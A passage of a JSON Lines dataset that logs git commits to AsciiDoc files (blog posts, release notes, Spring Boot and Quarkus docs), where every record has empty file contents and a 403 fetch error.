example\n","repos":"asciidoctor\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,asciidoctor\/asciidoctor-doctest","old_file":"data\/examples\/asciidoc\/block_pass.adoc","new_file":"data\/examples\/asciidoc\/block_pass.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahmanusta\/asciidoctor-doctest.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f29771feebe73ceb3bcb1e8c0e4ac081b9283197","subject":"add blog","message":"add blog\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/06\/04\/deref.adoc","new_file":"content\/news\/2021\/06\/04\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a712454482dafe8abcaca05f197748cfa9b6edb0","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/09\/24\/deref.adoc","new_file":"content\/news\/2021\/09\/24\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c5ea2fdbd4a91f1f7c881c074639743c674ecd7b","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a6344c81d040ab2e0cecebdb7dd29b4b51b7899","subject":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","message":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02823ebdd2698184fbf29c4f03c97b6805cd7281","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800d23f7a6e231010bf96fa219cc6e9ae7f84cc1","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f80790b728db8414b2c2a86a69bec320a42e69e9","subject":"Delete the file at '_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","message":"Delete the file at '_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c8615f1e5da533f9b3867137ac6ffde602b091d","subject":"Blog about inventory 0.15.0.Final release.","message":"Blog about inventory 0.15.0.Final release.\n","repos":"pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/04\/27\/hawkular-inventory-0.15.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/04\/27\/hawkular-inventory-0.15.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee099c680c99ec4b71d059336d47e78acee8b0cb","subject":"Update 2017-07-22-Bechmarking-HIP-Cffe.adoc","message":"Update 2017-07-22-Bechmarking-HIP-Cffe.adoc","repos":"itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io","old_file":"_posts\/2017-07-22-Bechmarking-HIP-Cffe.adoc","new_file":"_posts\/2017-07-22-Bechmarking-HIP-Cffe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsnarsi\/itsnarsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97301378faad763b6b7df3ef5ec140f63a9a888","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b5bd8ac81cfa7039f5caaf662f5114b401c2508","subject":"Issue #4 Renamed macro-processes to processes","message":"Issue #4 Renamed macro-processes to processes\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3880f717e21fec356927ec78199d702b692575ad","subject":"Create README.adoc","message":"Create README.adoc","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/example_udp_echo\/README.adoc","new_file":"examples\/example_udp_echo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22807fcb41c30043d868893422510b66f29270c7","subject":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","message":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da119eda0788e24a1b481272cd09f63affe0485e","subject":"Update 2015-12-01-How-to-flash-a-target-board-using-a-function-provision-on-Brillo.adoc","message":"Update 2015-12-01-How-to-flash-a-target-board-using-a-function-provision-on-Brillo.adoc","repos":"geummo\/geummo.github.io,geummo\/geummo.github.io,geummo\/geummo.github.io","old_file":"_posts\/2015-12-01-How-to-flash-a-target-board-using-a-function-provision-on-Brillo.adoc","new_file":"_posts\/2015-12-01-How-to-flash-a-target-board-using-a-function-provision-on-Brillo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/geummo\/geummo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffd62df2aa7e3ee07d28ec575023c49f55a03ebe","subject":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","message":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63df29f1c7a3a6486fb8e2fe8612a194afd8cfd9","subject":"Update 2015-09-22-Protect-a-Fabric8-REST-Service-with-Apiman.adoc","message":"Update 2015-09-22-Protect-a-Fabric8-REST-Service-with-Apiman.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-09-22-Protect-a-Fabric8-REST-Service-with-Apiman.adoc","new_file":"_posts\/2015-09-22-Protect-a-Fabric8-REST-Service-with-Apiman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dfd03da19d278ccc8adf3338024bd61792fb287","subject":"Add jreleaser guide for native executables","message":"Add jreleaser guide for native executables\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/jreleaser.adoc","new_file":"docs\/src\/main\/asciidoc\/jreleaser.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30cf9002879c48e190260d115d0e5dacd0fad8bb","subject":"[release notes]: update notes for RYW read mode","message":"[release notes]: update notes for RYW read mode\n\nChange-Id: I0bc5ae8452634a015891064bab5249eed6badf3e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9634\nTested-by: Hao Hao <99da4db57fde39d3df9f1908299d10b8082bf864@cloudera.com>\nReviewed-by: David Ribeiro Alves <dbbafdb4f25eb0c1ff3facf0e5f2f27705055af1@gmail.com>\n","repos":"andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73a55fd7e1e0949140bee417d3aabfdb6e8467ca","subject":"Add link to spring module docs to the release notes","message":"Add link to spring module docs to the release notes\n","repos":"raphw\/spock,raphw\/spock,siordache\/spock,spockframework\/spock,siordache\/spock,leonard84\/spock,raphw\/spock,siordache\/spock","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonard84\/spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c059f1374f57afc90153de5af49f0eb7e4109c3f","subject":"Update 2016-05-02-Blog-Post-Title.adoc","message":"Update 2016-05-02-Blog-Post-Title.adoc","repos":"abesn\/hubpress.io,abesn\/hubpress.io,abesn\/hubpress.io,abesn\/hubpress.io","old_file":"_posts\/2016-05-02-Blog-Post-Title.adoc","new_file":"_posts\/2016-05-02-Blog-Post-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abesn\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adb075a205ed817965c0e6e9a703e45d73aa8a7d","subject":"Update 2016-08-31-Texto-de-prueba.adoc","message":"Update 2016-08-31-Texto-de-prueba.adoc","repos":"mager19\/mager19.github.io,mager19\/mager19.github.io,mager19\/mager19.github.io,mager19\/mager19.github.io","old_file":"_posts\/2016-08-31-Texto-de-prueba.adoc","new_file":"_posts\/2016-08-31-Texto-de-prueba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mager19\/mager19.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49fefdafd86a2349cecaa1438a019cd5b6cdb392","subject":"Fix doc formatting","message":"Fix doc formatting\n\nCloses gh-6275\n","repos":"shakuzen\/spring-boot,mdeinum\/spring-boot,zhanhb\/spring-boot,RichardCSantana\/spring-boot,royclarkson\/spring-boot,shakuzen\/spring-boot,jvz\/spring-boot,ihoneymon\/spring-boot,bclozel\/spring-boot,mosoft521\/spring-boot,NetoDevel\/spring-boot,habuma\/spring-boot,lburgazzoli\/spring-boot,isopov\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,candrews\/spring-boot,javyzheng\/spring-boot,jbovet\/spring-boot,philwebb\/spring-boot,minmay\/spring-boot,i007422\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,eddumelendez\/spring-boot,sbcoba\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,linead\/spring-boot,bclozel\/spring-boot,lburgazzoli\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,felipeg48\/spring-boot,htynkn\/spring-boot,shangyi0102\/spring-boot,ollie314\/spring-boot,jayarampradhan\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,candrews\/spring-boot,qerub\/spring-boot,hello2009chen\/spring-boot,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,NetoDevel\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,Nowheresly\/spring-boot,deki\/spring-boot,bijukunjummen\/spring-boot,RichardCSantana\/spring-boot,jxblum\/spring-boot,bclozel\/spring-boot,qerub\/spring-boot,spring-projects\/spring-boot,isopov\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,brettwooldridge\/spring-boot,zhanhb\/spring-boot,bijukunjummen\/spring-boot,Nowheresly\/spring-boot,sbcoba\/spring-boot,DeezCashews\/spring-boot,afroje-reshma\/spring-boot-sample,joshiste\/spring-boot,bclozel\/spring-boot,DeezCashews\/spring-boot,bijukunjummen\/spring-boot,bbrouwer\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,pvorb\/spring-boot,ihoneymon\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,hello2009chen\/spring-boot,jxblum\/spring-boot,bbrouwer\/spring-boot,hello2009chen\/spring-boot,vpavic\/spring-boot,ptahchiev\/spring-boot,joshthornhill\/spring-boot,drumonii\/spring-boot,donhuvy\/spring-boot,pvorb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,nebhale\/spring-boot,ptahchiev\/spring-boot,lburgazzoli\/spring-boot,olivergierke\/spring-boot,akmaharshi\/jenkins,bijukunjummen\/spring-boot,tsachev\/spring-boot,aahlenst\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,deki\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,linead\/spring-boot,tiarebalbi\/spring-boot,sebastiankirsch\/spring-boot,bjornlindstrom\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,qerub\/spring-boot,lucassaldanha\/spring-boot,eddumelendez\/spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,drumonii\/spring-boot,hqrt\/jenkins2-course-spring-boot,javyzheng\/spring-boot,jxblum\/spring-boot,sbcoba\/spring-boot,hqrt\/jenkins2-course-spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,vpavic\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,vakninr\/spring-boot,joshthornhill\/spring-boot,ptahchiev\/spring-boot,sebastiankirsch\/spring-boot,dreis2211\/spring-boot,ihoneymon\/spring-boot,rweisleder\/spring-boot,sebastiankirsch\/spring-boot,shangyi0102\/spring-boot,yangdd1205\/spring-boot,linead\/spring-boot,joshiste\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,lexandro\/spring-boot,tiarebalbi\/spring-boot,royclarkson\/spring-boot,akmaharshi\/jenkins,Nowheresly\/spring-boot,NetoDevel\/spring-boot,vpavic\/spring-boot,linead\/spring-boot,michael-simons\/spring-boot,vakninr\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,ilayaperumalg\/spring-boot,donhuvy\/spring-boot,mosoft521\/spring-boot,jvz\/spring-boot,kamilszymanski\/spring-boot,cleverjava\/jenkins2-course-spring-boot,drumonii\/spring-boot,jayarampradhan\/spring-boot,mbogoevici\/spring-boot,akmaharshi\/jenkins,lucassaldanha\/spring-boot,javyzheng\/spring-boot,nebhale\/spring-boot,dreis2211\/spring-boot,DeezCashews\/spring-boot,ihoneymon\/spring-boot,sbcoba\/spring-boot,hqrt\/jenkins2-course-spring-boot,habuma\/spring-boot,lburgazzoli\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,cleverjava\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,jvz\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshiste\/spring-boot,donhuvy\/spring-boot,kamilszymanski\/spring-boot,chrylis\/spring-boot,bbrouwer\/spring-boot,olivergierke\/spring-boot,zhanhb\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,habuma\/spring-boot,hqrt\/jenkins2-course-spring-boot,minmay\/spring-boot,jayarampradhan\/spring-boot,isopov\/spring-boot,tiarebalbi\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,Buzzardo\/spring-boot,olivergierke\/spring-boot,hqrt\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,jayarampradhan\/spring-boot,tsachev\/spring-boot,pvorb\/spring-boot,eddumelendez\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,NetoDevel\/spring-boot,brettwooldridge\/spring-boot,deki\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,RichardCSantana\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,philwebb\/spring-boot,mbogoevici\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,akmaharshi\/jenkins,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,herau\/spring-boot,lexandro\/spring-boot,mbogoevici\/spring-boot,scottfrederick\/spring-boot,isopov\/spring-boot,mbenson\/spring-boot,DeezCashews\/spring-boot,habuma\/spring-boot,lucassaldanha\/spring-boot,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,donhuvy\/spring-boot,javyzheng\/spring-boot,candrews\/spring-boot,kdvolder\/spring-boot,deki\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jxblum\/spring-boot,ihoneymon\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,xiaoleiPENG\/my-project,jbovet\/spring-boot,scottfrederick\/spring-boot,yhj630520\/spring-boot,bijukunjummen\/spring-boot,xiaoleiPENG\/my-project,jvz\/spring-boot,joshiste\/spring-boot,habuma\/spring-boot,kdvolder\/spring-boot,vakninr\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,kdvolder\/spring-boot,ilayaperumalg\/spring-boot,mbogoevici\/spring-boot,joshthornhill\/spring-boot,olivergierke\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,yangdd1205\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,javyzheng\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,lucassaldanha\/spring-boot,ollie314\/spring-boot,michael-simons\/spring-boot,SaravananParthasarathy\/SPSDemo,aahlenst\/spring-boot,SaravananParthasarathy\/SPSDemo,SaravananParthasarathy\/SPSDemo,chrylis\/spring-boot,pvorb\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,drumonii\/spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,brettwooldridge\/spring-boot,sebastiankirsch\/spring-boot,rweisleder\/spring-boot,herau\/spring-boot,lexandro\/spring-boot,lucassaldanha\/spring-boot,isopov\/spring-boot,i007422\/jenkins2-course-spring-boot,lexandro\/spring-boot,afroje-reshma\/spring-boot-sample,ollie314\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,bbrouwer\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,akmaharshi\/jenkins,spring-projects\/spring-boot,tsachev\/spring-boot,tiarebalbi\/spring-boot,minmay\/spring-boot,mdeinum\/spring-boot,yhj630520\/spring-boot,philwebb\/spring-boot,lexandro\/spring-boot,vakninr\/spring-boot,qerub\/spring-boot,felipeg48\/spring-boot,RichardCSantana\/spring-boot,isopov\/spring-boot,nebhale\/spring-boot,kamilszymanski\/spring-boot,tsachev\/spring-boot,jbovet\/spring-boot,SaravananParthasarathy\/SPSDemo,Buzzardo\/spring-boot,scottfrederick\/spring-boot,tsachev\/spring-boot,olivergierke\/spring-boot,i007422\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,DeezCashews\/spring-boot,yhj630520\/spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,bbrouwer\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,afroje-reshma\/spring-boot-sample,jbovet\/spring-boot,minmay\/spring-boot,herau\/spring-boot,qerub\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,mosoft521\/spring-boot,sebastiankirsch\/spring-boot,ptahchiev\/spring-boot,kdvolder\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,hello2009chen\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,sbcoba\/spring-boot,hello2009chen\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,joshiste\/spring-boot,donhuvy\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,felipeg48\/spring-boot,wilkinsona\/spring-boot,xiaoleiPENG\/my-project,mosoft521\/spring-boot,royclarkson\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,bjornlindstrom\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,shangyi0102\/spring-boot,herau\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5cdd874d55248b93bfe6ccfd1290e924bea8b43e","subject":"Document `@AutoconfigureOrder`","message":"Document `@AutoconfigureOrder`\n\nCloses gh-4546\n","repos":"htynkn\/spring-boot,royclarkson\/spring-boot,kdvolder\/spring-boot,yhj630520\/spring-boot,deki\/spring-boot,jxblum\/spring-boot,lucassaldanha\/spring-boot,ptahchiev\/spring-boot,xiaoleiPENG\/my-project,mrumpf\/spring-boot,qerub\/spring-boot,DeezCashews\/spring-boot,brettwooldridge\/spring-boot,candrews\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,vakninr\/spring-boot,hello2009chen\/spring-boot,qerub\/spring-boot,nebhale\/spring-boot,sebastiankirsch\/spring-boot,ilayaperumalg\/spring-boot,RichardCSantana\/spring-boot,ollie314\/spring-boot,philwebb\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,afroje-reshma\/spring-boot-sample,kamilszymanski\/spring-boot,sbuettner\/spring-boot,rweisleder\/spring-boot,xiaoleiPENG\/my-project,izeye\/spring-boot,NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,jmnarloch\/spring-boot,deki\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,tiarebalbi\/spring-boot,spring-projects\/spring-boot,javyzheng\/spring-boot,SaravananParthasarathy\/SPSDemo,akmaharshi\/jenkins,dfa1\/spring-boot,habuma\/spring-boot,ameraljovic\/spring-boot,neo4j-contrib\/spring-boot,linead\/spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,tiarebalbi\/spring-boot,lexandro\/spring-boot,bijukunjummen\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,shangyi0102\/spring-boot,jbovet\/spring-boot,yangdd1205\/spring-boot,sbcoba\/spring-boot,minmay\/spring-boot,bijukunjummen\/spring-boot,mbogoevici\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-